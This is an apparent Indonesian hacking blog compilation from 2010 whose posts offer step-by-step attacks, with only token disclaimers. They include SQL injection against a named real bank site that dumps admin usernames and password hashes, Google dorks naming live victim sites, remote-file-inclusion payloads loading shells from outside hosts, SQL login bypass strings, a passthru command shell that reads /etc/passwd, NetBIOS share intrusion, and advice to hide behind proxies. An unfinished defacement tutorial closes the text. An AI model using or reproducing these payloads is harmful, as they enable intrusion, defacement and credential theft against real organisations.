“Target sengaja tidak saya sensor agar PoC (Proof of Concept) pada tutorial ini jelas. Kepada para pembaca saya harapkan untuk tidak melakukan tindakan pengerusakan di kemudain hari pada web site ini. Ingat, dengan melakukan pengerusakan berarti anda membunuh karier terhormat anda di masa depan. Pergunakanlah sebatas pembelajaran”

2. Mencari celah kelemahan

Pengujian apakah calon korban memiliki kelemahan SQL atau tidak. Kita dapat menambahkan karakter minus (-) atau petik tunggal (‘) [tergantung pada sistem (- atau ‘)]pada query yang ada. Jika kita mendapatkan error berarti calon korban memiliki kelemahan terlepas dari bisa di injeksi lebih lanjut atau tidak.

(-) ditambahkan sebelum item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=-2
(‘) ditambahkan sesudah item pada query seperti berikut:
http://www.bankpapua.com/kantor.php?jenis=2’

Pada tutorial ini, teknik kedua yang memunculkan error! (berarti web site target memiliki kelemahan SQL Injection. Error yang kita dapatkan adalah:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118

3. Mendapatkan jumlah kolom

Tahap selanjutnya adalah mendapatkan jumlah kolom pada tabel aktif. Tekniknya adalah dengan menggunkan perintah order by sebagai berikut:

http://www.bankpapua.com/kantor.php?jenis=2+order+by+1--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+2--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+3--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+4--
http://www.bankpapua.com/kantor.php?jenis=2+order+by+5--
.
.
.
Kita lakukan pengujian satu persatu (boleh dilompat) hingga kita mendapatkan error yang berarti jumlah kolom terakhir (yang tidak error) merupakan jumlah kolom pada tabel aktif. Pada tutorial ini, kita mendapatkan error pada pengujian ke-6.

http://www.bankpapua.com/kantor.php?jenis=2+order+by+6--

Kita mendapatkan error:

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /home/sloki/user/u8543b/sites/bankpapua.com/www/kantor.php on line 118

Berarti jumlah kolom pada tabel aktif adalah 5 (pengujian terakhir yang tidak error)

4. Mendapatkan angka keberuntungan

Angka keberuntungan adalah angka yang dimunculkan oleh sistem yaitu angka antara range jumlah kolom aktif (dalam kasus ini 1-5). Perintah yang kita gunakan adalah union select sebagai berikut:

http://www.bankpapua.com/kantor.php?...C2%2C3%2C4%2C5--

[Jangan lupa menambahkan karakter minus (-) pada awal key (pada kasus kita, key adalah 2)]. Kita mendapatkan angka 1,2,3, dan 4. Di angka-angka inilah tempat kita melakukan query.

5. Mendapatkan versi database server

Dapatkan versi server SQL (dalam kasus ini, MySQL) dengan perintah version(), atau @@version. Kita gunakan version() dan kita pilih angka 4:

http://www.bankpapua.com/kantor.php?...%2C3%2Cversion(),5--

Kita mendapatkan 5.0.51a-24+lenny4 yang berarti MySQL versi 5. Kita sedikit beruntung karena menemukan versi 5 jika versi 4 maka tahap berikutnya adalah “Tebak-tebak buah nanas”.

6. Mendapatkan nama tabel

Gunakan perintah group_concat(table_name) dengan penyeleksian dari information_schema.tables sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(table_name),5+from+information_schema.tables+wher e+table_schema=database()--

Kita mendapatkan nama-nama tabel sebagai berikut:
adunasabah,agenda,anual,atm,atmprima,atmsama,berit a,birate,bunga,
galery,kantor,karir,kontak,konter,kurs,lapkeu,link ers,manajemen,pesertaquiz,
polling_d,polling_h,produk,promo,quiz_peserta,quiz _soal,regulasi,tamu,users. Dari sekian banyak kita pilih tabel users namun harus dikonversi ke heksadesimal terlebih dahulu. Silahkan kunjungi:

http://www.dolcevie.com/js/converter.html

kemudian kita mendapatkan (titik dua ( tidak diikutsertakan) users(ascii) -> 7573657273(hex)

7. Mendapatkan nama kolom

Gunakan perintah group_concat(column_name) dengan penyeleksian dari information_schema.columns sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(column_name),5+from+information_schema.columns+wh ere+table_name=0x7573657273--

0x7573657273 kita dapatkan dengan menggabungkan 0x dengan 7573657273 (hasil konversi tadi). Kita mendapatkan nama-nama kolom sebagai berikut:
ids,username,password,fullname,address,a_add,a_edi t,a_del,topadmin,akses. Kita pilih username dan password.

8. Mendapatkan Data

Gunakan perintah group_concat(username,0x3a,password) dengan penyeleksian tabel users tadi sebagai berikut:

http://www.bankpapua.com/kantor.php?...2Cgroup_concat(username,0x3a,password),5+from+users--

Kita mendapatkan:

webmaster: †¥²¯d”¥´¹¥¥¨±¬²»©¦£vttz
sdm: †¥²¯d”¥´¹¥•¨±uvw
sekper: †¥²¯d”¥´¹¥•©¯´©¶uvw

Terenkripsi Tahap berikutnya adalah mendapatkan plain text dari password yang terenkripsi, google! Setelah dapat, cari halaman admin kemudian login dengan account webmaster, Anda telah berhasil take over http://www.bankpapua.com/

N0LDR
“Tutorial ini hanya sebagai pembelajaran semata. Hacking is good”
sumber : jasakom.com

Artikel Asli Berjudul Hack Website menggunakan SQL injection
di www.perwira28.blogspot.com
Under Creative Commons License: Attribution Non-Commercial

LATIHAN HACK INJEK SQL

2010-02-23T12:23:00.000+07:00

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another.

Nah itu artinya SQL Injection, untuk translate ke bahasa sesuai yg ada mengerti silahkan di translate sendiri. :D.
Ok, SQL Injection itu sendiri dapat terjadi oleh beberapa faktor, di antaranya kesalahan setting pada server yang memungkinkan seorang attacker memasukkan karakter dan baris perintah yg membahayakan bagi program, selain itu juga kesalahan dalam coding yg tidak memfilter karakter yg diinputkan oleh user.

Sudah cukup basa basinya.. sekarang sedikit tutorialnya.. :D.
Pertama., carilah sasaran yang mau di injek - injek SQL nya.. Lha nyarinya dimana mas?? tanya lah pada rumput yg bergoyang dombret nyarinya… wjwkwkwkwk.. Nyari di google, misal’e dengan kata kunci

inurl:news.php?id= site:com

Nah.. buanyak bgt kan hasilnya…. sekarang tinggal kita coba satu buat test..
Misal kita menemukan sebuah site dengan alamat sebagai berikut….

http://www.target.com/english/news.php?id=64

Tahap selanjutnya mari kita tambahkan tanda petik (’) diakhir angka 64.. Ups… ternyata muncul kek gini..

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

Mungkin pada nanya.. mangnya kenapa kalo muncul kek gitu mas..?? Ya itu tandanya error kawand… dah nemu yg asyik error nya.. mari kita lanjutkan ketahap berikutnya.., Ilangkan saja tanda ‘ nya, ganti dengan tanda - (minus) jadi seperti berikut

http://www.target.com/english/news.php?id=-64+order+by+100–
Keterangan : angka 100 itu untuk mencari field nya, tanda minus double di belakang digunakan untuk memberikan Comment pada Mysql Query sehingga sistem tidak akan menjalankan perintah selanjutnya.

setelah ditulis kek gitu… ternyata terdapat error.. like this

Unknown column ‘100' in ‘order clause’

Weeh… Column 100 ndak ada katanya… kita perkecil lagi… coba angka angka misal 10,9 dll ok. Sampai dia tidak memunculkan error unknown column tadi… Setelah di dapat angka yang tidak memunculkan error trus langkah selanjutnya kepriben kiye… (walah boso ngendi maneh.. @_@)…

Buat langkah selanjutnya marih kita select column column tersebut. Lha nyara select nya piye, begini, mari kita coba dengan cara yg sederhana.. misalnya tadi g ada error di coloum 9 so, perintahnya like this

http://www.target.com/english/news.php?id=-64+union+select+1,2,3,4,5,6,7,8,9–

Ok, dah running querynya di address bar, tunggu beberapa saat dan berharaplah akan muncul suatu mukjizat.. wkwkwkwkwkwkw. Nah setelah loading selesai, liad di browser, angka berapa ajah yg muncul… (tempat munculnya di tempat seharusnya artikel ato berita muncul). Misal’e yang muncul tuh angka 3, mari kita explore lebih jauh lagi… kita lihat versi dari databasenya. caranya dengan menjalakan seperti ini

http://www.target.com/english/news.php?id=-64+union+select+1,2,version(),4,5,6,7,8,9–

Nah, setelah itu bakal muncul deh versi dari databasenya, bisa aja versinya 5.2, ato 4.0 atau yg lainnya. Setelah dapet versi databasenya, lanjutin deh buat ngedapetin yang namanya table - table nya. Lha caranye gimana Om??? Wes ga usah panjang x lebar, tar jadi luas wkwkwkw… Untuk mysql versi 5, kita bisa manfaatin yang namanya Information_schema, nah kalo versi 4, ya kita hanya bisa berdoa dan berharap alias maen tebak tebakan… wkwkwkwkwkw.

Buat mencari nama table table nya bisa kita lakuin dengan cara seperti ini.

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(table_name),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()–

Query diatas bakal menghasilkan nama nama table yg ada di database sesuai dengan nama database yg di gunakan, dan sudah dech kita tinggal pilih table mana yg bakal kita extract colom2 nya dan buat kita cari isi dari colom2 nya.. :D. . Lha cara mengetahui column nya gmn mas??? Nah lho.. lom taut tho… Ok, buat cari tau nama nama column nya kita butuh bantuin sebuah alat yg gunanya buat meng-convert code ascii ke hexa, gunanya buat mengambil nama column berdasar nama table nya..

Nh tak kasih sekalian website yg nyedian fasilitas buat ngonvert hexa to ascii, bisa di coba di http://centricle.com/tools/ascii-hex/ tinggal kalian masukin nama table dah jadi dech kode ascii nya.. :D dan kita tinggal meng-query buat ngedapetin nama column nya seperti ini

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0xCODEASCITABLE–

Binggo…!!! kita udah ngedapetin nama nama column nya… tinggal deh men-select isinya…

http://www.target.com/english/news.php?id=-64+union+select+1,2,group_concat(nama_column1,0×3a,nama_column2,0×3a,column3),4,5,6,7,8,9+from+nama_tabel–

arti 0×3a : menampilkan karakter : (titik dua).

Dah.. kita dah dapet isi dari table table… tinggal dilanjutin sendiri…

dah selesai ya…

Happi testing esngiel injecktion ya…

MEREMOTE KOMPUTER ORANG

2010-02-23T12:17:00.000+07:00

Pernah dengar istilah NetBIOS over TCP/IP?Kalau sudah, sebaiknya lewatkan saja tulisan ini Dan jika belom boleh disimak :)
Tulisan ini tujuan hanya sebagai pembelajaran saja dan agar dapat kita selalu berhati hati. :) Informasi NetBios sebenarnya dapat kita pakai untuk exploitasi sistem lawan dan berikut ini suatu caruntuk exploitasi target yang menggunakan file/printer sharring

Dalam tulisan ini saya asumsikan anda menggunakan win 98
Sebelum kita mulai coba kita find nbtstat.exe
Sebenarnya fungsi file tersebut adalah untuk menampilkan statistik protokol dan koneksi tcp/ip

Langkah langkah exploitasi :)
1. Click Start-->Program-->MS-Dos prompt--> tulis nbtstat lalu enter
2. Click Start-->Run-->tulis nbtstat lalu OK

Kira kira mucul sperti ini :
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n] [-r] [-R] [-RR] [-s] [-S][interval] ]

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh

RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying statistics.

Dari informasi diatas sebenarnya sudah dapat kita ketahui fungsi dari nbtstat.exe

Pada kesempatan ini saya akan coba mengulas 2 option diatas yaitu :
-A
-a

misal kita mau mencoba komputer dengan names belog.wasantara.net.id
maka kita gunakan :
nbtstat -a belog.wasantara.net.id

misal kita mau mencoba komputer dengan ip 192.168.1.1
maka kita gunakan :
nbtstat -A 192.168.1.1

Dari perintah diatas kemungkinan yang muncul adalah :
1. Host not found
2. Dan pesan indah seperti dibawah ini :

--------------------------------------------

NetBIOS Local Name Table

Name Type Status
---------------------------------------------
BELOG <00> UNIQUE Registered
POLOS <00> GROUP Registered
BELOG <03> UNIQUE Registered
BELOG <20> UNIQUE Registered
POLOS <1e> GROUP Registered

---------------------------------------------

Jika muncul pesan Host not found, segera hentikan usaha anda, karena akan buang waktu sia sia :)

Jika muncul pesan indah seperti diatas, sebaiknya anda tarik napas, karena perkerjaan lain akan menunggu.
Dari pesan indah tersebut yang menjadi catatan adalah karakter dengan kode BELOG <20> UNIQUE Registered, karena angka 20 ini adalah informasi file dan printer sharing.

Apa langkah kita selanjutnya ?
Setelah kita mempunyai info diatas, cari file yang bernama :
LMHOST atau HOST (win 9x)

Jika sudah ketemu, buka dengan editor seperti noteped dan tambahkan :
192.168.1.1 BELOG

Kemudian simpan.

Selanjutnya
Click Start-->Find-->Computer
masukan nama atau ipnya

Dan anda pasti akan berteriak girang, karena komputer remote sudah bisa anda jadikan seperti HD secondary anda :)

Selamat :)
nb : sekali lagi, mohon tulisan ini hanya sebagai bahan pembelajaran saja dan bukan digunakan untuk merusak dan dari tulisan ini saya berharap, kita jangan seenaknya membuka file/printer sharing

HACK SITE DENGAN INJEK SQL

2010-02-23T11:58:00.001+07:00

Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya uptodate tiap menit bahkan detik siapa tuh yang update yahh para hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN INI.titik

Pembahasan:

------------------------------------------------
keyword:inurl:"/cart.php?m="
contoh:http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : 'or"=" password :'or"="
------------------------------------------------
keyword inurl:"/modernbill"
contoh:http://billing.ourweb.net/modernbill/
masukin injekannya:include/html/config.php?DIR=http://one-server.us/injek.txt?
jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=http://one-server.us/injek.txt?
------------------------------------------------
keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action="
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin
login pake user: admin pass: 'or''='
------------------------------------------------
inurl:"modules.php?name=SQuery"
injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
contoh:http://www.dies-world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
------------------------------------------------
google:allinurl:com_galleria
injek:components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://one-server.us/item.txt?
contoh:http://www.a1gpracing.net/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?
------------------------------------------------
google:allinurl:"/auth/lostPassword.php"
contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.php
injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?
jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?includePath=http://one-server.us/item.txt
------------------------------------------------
google:intitle:"Multimedia Flash Website Builder"
contoh:www.webdesignhq.com/sitebuilder/index.php
injek:sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
------------------------------------------------
gogle:"software 2004-2005 by randshop"
contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&katid=32&action=detail
injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
------------------------------------------------
keyword;"powered by geeklog"
contoh:http://www.kobe-ch.com/index.php
injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
jadi:http://www.kobe-ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
------------------------------------------------
google:inurl:"/product.php?printable=" atau "powered by x-cart"
inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin
kekekek biasa sqlnya cari sendiri ya
------------------------------------------------
keyword:inurl:"/index. php?option=com_rsgallery"
bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item,txt?
contoh:http://www.pass-my-shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item.txt?
------------------------------------------------
keyword:"Advanced Poll" inurl:/admin/
contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php
bug:common.inc.php?base_path=http://elang13.org/item.txt?
jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php?base_path=http://elang13.org/item.txt?
------------------------------------------------
inurl:"powered by cs-cart"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt?
------------------------------------------------
inurl:"/catalogue.php?cat="
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak

inurl:"/DoceboScs" injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt?
inurl:"/DoceboCore" injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboLms" injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboKms" injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboCMS" injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"dload.php"
injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?
------------------------------------------------
"powered by squirrelcart"
injek : squirrelcart/cart_content.php?cart_isp_root=
------------------------------------------------
keyword inurl:/ubbthreads/
injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"index.php?target=categories"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt?
------------------------------------------------
google : "Exhibit Engine 1.5 RC 4"
injek:photo_comment.php?toroot=http://elang13.org/item.txt?
------------------------------------------------
inurl:"/modules/Forums/
injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt?
------------------------------------------------
allinurl: includes/include_once.php
bug:includes/include_once.php?include_file=http://elang13.org/item.txt?
------------------------------------------------
allinurl:/phplivehelper/blank.php
injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?
------------------------------------------------
google:"powered by DreamAccount"
injeknya:
auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
auth.header.inc.php?da_path=http://elang13.org/item.txt?
auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
------------------------------------------------
ashopKart20/" ganti tulisan yang ada didepannya ama admin/scart.mdb
------------------------------------------------
inurl:"//comersus/" ganti /store/xxxx.asp dengan
database/comersus.mdb
------------------------------------------------
allinurl:/shop/category.asp/catid=
hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt
http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp
------------------------------------------------
inurl:"/admin/default.asp"
username:admin password:'or''='
span style="color: rgb(51, 51, 255);">------------------------------------------------
inurl:"/metacart/"
injek : database/metacart.mdb
------------------------------------------------
inurl:"/store/proddetail.asp?prod="
ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
------------------------------------------------
inurl:"/AdminLogin.asp"
login pake sql ini :
usename:1'or'1'='1
password:1'or'1'='1
------------------------------------------------
inurl:"com_a6mambocredits"
http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt
------------------------------------------------
"Welcome to phpMyAdmin" inurl:main.php
------------------------------------------------
filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )
------------------------------------------------
inurl:"com_peoplebook"
inurl:"com_comprofiler"

HACK SITE DENGAN PHP INJEK

2010-02-23T11:54:00.001+07:00

Php Injection (updated every day)
Pada kesempatan kali ini kita akan membahas mengenai PhpInjection, apa itu PhpInjection? Bagaimana menemukannya dan bagaimana penanganannya.
Pertama kali kita membutuhkan sedikit keahlian yaitu mengenal sedikit tentang apa dan bagaimana itu script php. Script php merupakan salah satu script yang sampai saat ini banyak digunakan oleh seorang webmaster, disamping rival nya Java. Script php ini begitu 'Powerfull', mengapa dikatakan demikian karena dalam script php ini kita bisa melakukan banyak hal. Mulai dari membuat file, membuat counter, membuat date, membuat bukutamu, membuat forum (salah satunya PhpBB), mengakses database secara langsung maupun juga membuat gambar dan animasi. Kesemuanya itu sudah terdapat dalam fungsi dari script php ini. Nah karena hal itu lah maka masih banyak orang yang menggunakannya untuk membangun sebuah website, selain karena cukup mudah dipelajari.
Disini kita tidak akan membahas mengenai bagaimana melakukan semua itu, karena maaf ini bukan saatnya untuk belajar php tapi saatnya belajar hacking dengan menggunakan kelebihan dari script php dan kelemahan dari webmaster yang menggunakannya. Jadi cukup sudah basa-basinya.
Begitu banyak orang menanyakan bagaimana untuk mencari bugs pada script php yang ada, sebenarnya ilmu ini sudah lama dan tutorial nya juga sudah begitu banyak di tulis oleh berbagai orang pada berbagai website tentang security jaringan dan hacker, baik milik komunitas maupun milik pribadi. Pada kesempatan ini biarlah saya mengulas sedikit dan mengulang kembali tentang injection pada script php yang lebih dikenal dengan nama PhpInjection.

1. Seperti dijelaskan diatas script php banyak memiliki kelebihan dan mudah digunakan. Nah otomatis banyak webmaster yang menggunakan nah otomatis sasaran kita juga semakin banyak (walau untuk sekarang ini hanya sedikit karena webmaster sudah menyadari kekurangannya).
2. Sebelum kita menggunakan ilmu kita dan memulai pencarian kita, jangan lupa selalu siapkan 2 point penting dari semuanya. Apa itu? Tentu saja 'ROKOK' dan 'KOPI'. Nah setelah kita santai dan dapat berkonsentrasi maka kita bisa mulai aksi kita.
3. Pertama kali kita harus mengakui kehebatan dari om 'Google' dari sana lah kita mendapatkan semuanya. Nah untuk menambah kasanah pengetahuan tentang 'Google hack ada baiknya kita membaca buku 'Hack Attack' Cara dan penanggulanganya oleh teman kita dari jasakom.Atau kunjungi saja langsung situs www. jasakom.com.
Nah untuk memulai pencarian kita masukkanlah kata kunci berikut untuk mendapatkan target kita :
Untuk forum :
allinurl:my_egallery site:.org
allinurl:xgallery site:.org
allinurl:coppermine site:.org
allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
allinurl:ihm.php?p=
allinurl:.php?bodyfile=
allinurl:/default.php?page=home
allinurl:/folder.php?id=
allinurl:main.php?pagina=
allinurl:/modules.php?name=allmyguests
allinurl:AshNews atau allinurl: /ashnews.php
allinurl:ihm.php?p=*
allinurl:kietu/hit_js.php
allinurl:/Popper/index.php?
keyword : "Powered by phpBB 2.0.6"
keyword : "powered by CubeCart 3.0.6"
keyword : "powered by paBugs 2.0 Beta 3"
Keyword : "powered by AllMyLinks"
keyword : /phorum/login.php
keyword : "powered eyeOs"
allinurl:/includes/orderSuccess.inc.php?glob=
allinurl:modules.php?name=Forums

Harap diperhatikan bahwa masih banyak alternatif yang lain yang bisa digunakan sebagai keyword.
Kalo memang rajin coba liat ajah listnya di :
-= http://www.geocities.com/kake_rgb/list.txt =-

4. Nah cara kamu menginject adalah dengan index.php?page=http://www.jasakom.com
atau kalau kamu tidak berhasil coba dengan list berikut :
Ganti modul :

1. my_egallery: /modules/My_eGallery/public/displayCategory.php?basepath=
2. xgallery: /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=
3. coppermine: /modules/coppermine/themes/default/theme.php?THEME_DIR
4. 4nAlbum: /modules/4nAlbum/public/displayCategory.php?basepath=
5. PNphpBB2 /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
6. AllMyGuests: /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=
7. /Popper/index.php? : /Popper/index.php?childwindow.inc.php?form=
8. kietu : kietu/index.php?kietu[url_hit]=
9. "Powered by phpBB 2.0.6" : &highlight=%2527.include($_GET[a]),exit.%2527&a=
10. "powered by CubeCart 3.0.6" : /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
11. "powered by paBugs 2.0 Beta 3" : /class.mysql.php?path_to_bt_dir=
12. "powered by AllMyLinks" : /include/footer.inc.php?_AMLconfig[cfg_serverpath]=
13. /phorum/login.php : /phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=

14. "powered eyeOs" : /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=system($cmd);&cmd=id
diganti dengan :
/eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=

15. /includes/orderSuccess.inc.php?glob : http://[target]/[path]/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=

16 allinurl:modules.php?name=Forums : /modules.php?name=
=============================================================================
http://www.target.com/admin_modules/admin_module_captions.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delcomments.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_edit.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_delimage.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_overview.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/image-gd.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/album.class.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/show_random.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/main.inc.php?config[path_src_include]=http://www.injection.com/cmd?

http://www.target.com/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_include]=http://www.injection.com/cmd?

==========================================================================
5. Kalau kamu bisa melihat web jasakom.com, berarti sasaran sudah ditemukan. Jika belum berarti tutup dan beralih lah pada website berikutnya. Sebagai catatan bahwa untuk sekarang begitu banyak web sudah di patch, so jangan patah semangat dan teruslah berusaha. Dan juga jangan lupa semua orang yang membuka website dapat diketahui ipnya dari log file web server, terutama sekarang banyak web jebakan untuk mencatat ip yang mencoba menyerang, so jangan lupa gunakanlah anonymous proxy ato fake address untuk mengaburkan identitas kamu.

6. Nah klo udah dapet target maka mari kita selanjutnya kita harus cari webhosting gratis. Webhosting ini tidak perlu mendukung php.

Kemudian kita buat file dengan nama test.txt (nama file bebas). Isi file tersebut sebagai berikut:

passthru($test);
?>

simpan file tersebut, lalu upload ke webserver yang telah kita cari sebelumnya.

Sekarang kita siap untuk melakukan aksi kita.
Ketikkan di address bar dari browser kita alamat berikut:

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cal

jika kita berhasil maka kita akan mendapatkan respon sebagai berikut:
June 2004 Su Mo Tu We Th Fr Sa 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30

7. Nah klo kamu mau exploit coba yang satu ini :
http://www.example.com/index.php?module=subjects&func=listpages&subid=[SQL]
http://www.example.com/index.php?module=subjects&func=viewpage&pageid=[SQL]
http://www.example.com/index.php?module=subjects&func=listcat&catid=[SQL]

8. Gimana kalo kita masukkan perintah untuk menampilkan password account di server tersebut??

http://www.target.com/index.php?page=http://www.webgratiskita.com/test.txt&?&test=cat /etc/passwd

Nah kita bisa dapet dech passwd nya. Hmm setelah dapet passwd ngapain lagi yach ... terserah dech. Tapi jangan lah kasian mending kasih tau admin suruh patch sistem. hehehe

Sekian lah tutor kita kali ini. Semua tindakan yang dilakukan karena membaca tutor ini. Artikel ini dibuat hanyalah semata-mata untuk pengetahuan tindakan yang dilakukan karena membaca artikel ini bukanlah tanggung jawab penulis.

DEFACE WEBSITE LAGI

2010-02-09T13:52:00.001+07:00

Cara Deface Website
Diposkan oleh FatkhanSite's

Deface/Defacing atau cyber grafity secara umum diartikan sebagai aktifitas menodai atau
merubah ubah isi suatu halaman web dengan kalimat , image atau link tertentu yang tidak
ada sangkut pautnya dengan misi web tersebut , Biasanya hacker men-deface suatu
halaman web dengan maksud supaya eksistensinya diketahui oleh khalayak ramai.
Mungkin anda pernah dengar atau pernah mengunjungi suatu web yang terkena deface
seperti :

http://www.bandaaceh.go.id
http://www.pertamina.co.id
http://www.transtv.co.id
http://www.setkab.go.id
http://www.pom.go.id
http://www.usni.ac.id

Ternyata apabila kita perhatikan target target tersebut dengan seksama , para target
mempunyai kesamaan yaitu server web tersebut berjalan di Operating System Windows
2000 dan servernya adalah IIS 5.0/6.0.

Mungkin anda beranggapan bahwa deface server server web tersebut adalah hal yang
susah dan perlu waktu yang lama untuk menyusup ke server tersebut , ternyata hal
tersebut adalah mudah semudah copy dan paste , silahkan ikuti langkah langkah berikut ,
dalam hal ini gw menggunakan contoh penggunaan web folder pada Windows xp

1. Buatlah suatu halaman web seperti dibawah ini atau terserah anda dengan
menggunakan tool/software terserah anda seperti Frontpage , Macromedia , Note
pad dan lain lain

